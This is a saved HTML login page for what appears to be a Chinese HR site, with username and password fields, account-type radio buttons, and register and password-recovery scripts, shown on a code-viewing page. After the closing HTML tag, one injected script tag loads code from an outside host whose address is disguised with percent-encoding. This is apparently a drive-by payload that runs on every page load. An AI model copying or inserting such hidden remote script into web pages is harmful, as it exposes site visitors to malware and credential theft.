📄 logon.htm
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0035)http://www.edires.net/Hr/Logon.aspx -->
<HTML><HEAD><TITLE>Logon</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.3157" name=GENERATOR>
<META content=C# name=CODE_LANGUAGE>
<META content=JavaScript name=vs_defaultClientScript>
<META content=http://schemas.microsoft.com/intellisense/ie5
name=vs_targetSchema><LINK href="Logon.files/EDI.css" type=text/css
rel=stylesheet>
<STYLE type=text/css>BODY {
MARGIN: 0px
}
TABLE {
FONT-SIZE: 12px
}
</STYLE>
<SCRIPT language=javascript>
function register()
{
var rbPersonal = document.getElementById("rbPersonal");
if (rbPersonal.checked) {
window.open("../Hr/UserReg.aspx");
}
else {
window.open("../Hr/EnterpriseReg.aspx");
}
}
function forgetPass()
{
window.top.location = "../bbs/user_getback.aspx";
return;
}
function IFrameResize(){
IFrameResizeH();
window.setTimeout(IFrameResizeH, 500);
window.setTimeout(IFrameResizeH, 2000);
window.setTimeout(IFrameResizeH, 5000);
}
function IFrameResizeH() {
var obj = parent.document.getElementById("ifmLogon");
obj.height = this.document.body.scrollHeight;
if (obj.height == 0) {
obj.height = 106;
}
//alert(obj.height);
}
</SCRIPT>
</HEAD>
<BODY onload=IFrameResize()>
<FORM id=Form1 name=Form1 action=Logon.aspx method=post><INPUT type=hidden
value=dDwtMTE3ODUwOTU3Mzs7bDxidG5Mb2dpbjtyYlBlcnNvbmFsO3JiRW50ZXJwcmlzZTtyYkVudGVycHJpc2U7Pj6Qh53XaMBAXKhW6xgd2HFd4ermtQ==
name=__VIEWSTATE>
<TABLE cellSpacing=0 cellPadding=0 width=188 align=center border=0>
<TBODY>
<TR>
<TD><IMG id=Image1 style="WIDTH: 188px; HEIGHT: 5px" alt=""
src="Logon.files/top1_04.gif" border=0></TD></TR>
<TR bgColor=#e7e7e7>
<TD bgColor=#e7e7e7>
<DIV id=pnlLogin>
<TABLE cellSpacing=0 cellPadding=0 width="95%" align=center border=0>
<TBODY>
<TR>
<TD width="56%"><INPUT class=n14 id=txtUserName
style="WIDTH: 112px; HEIGHT: 18px" tabIndex=1 value=ID
name=txtUserName></TD>
<TD align=right width="44%"><INPUT id=btnLogin
style="WIDTH: 56px; HEIGHT: 16px" type=image alt=""
src="Logon.files/top1_09.gif" border=0 name=btnLogin></TD></TR>
<TR>
<TD><INPUT id=txtPassword style="WIDTH: 112px; HEIGHT: 18px"
tabIndex=2 type=password name=txtPassword></TD>
<TD align=right><IMG id=Image2 style="WIDTH: 56px; HEIGHT: 16px"
onclick=register(); alt="" src="Logon.files/top1_10.gif"
border=0></TD></TR>
<TR vAlign=bottom>
<TD><SPAN class=n12><INPUT id=rbPersonal type=radio CHECKED
value=rbPersonal name=LoginType><LABEL
for=rbPersonal>个人</LABEL></SPAN> <INPUT id=rbEnterprise type=radio
value=rbEnterprise name=LoginType><LABEL for=rbEnterprise>企业</LABEL>
<TD class=n12><A class=link2 onclick=forgetPass();
href="javascript:;">忘记密码?</A></TD></TR></TBODY></TABLE></DIV></TD></TR>
<TR>
<TD background=Logon.files/top1_05.gif
height=6></TD></TR></TBODY></TABLE></FORM></BODY></HTML>
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -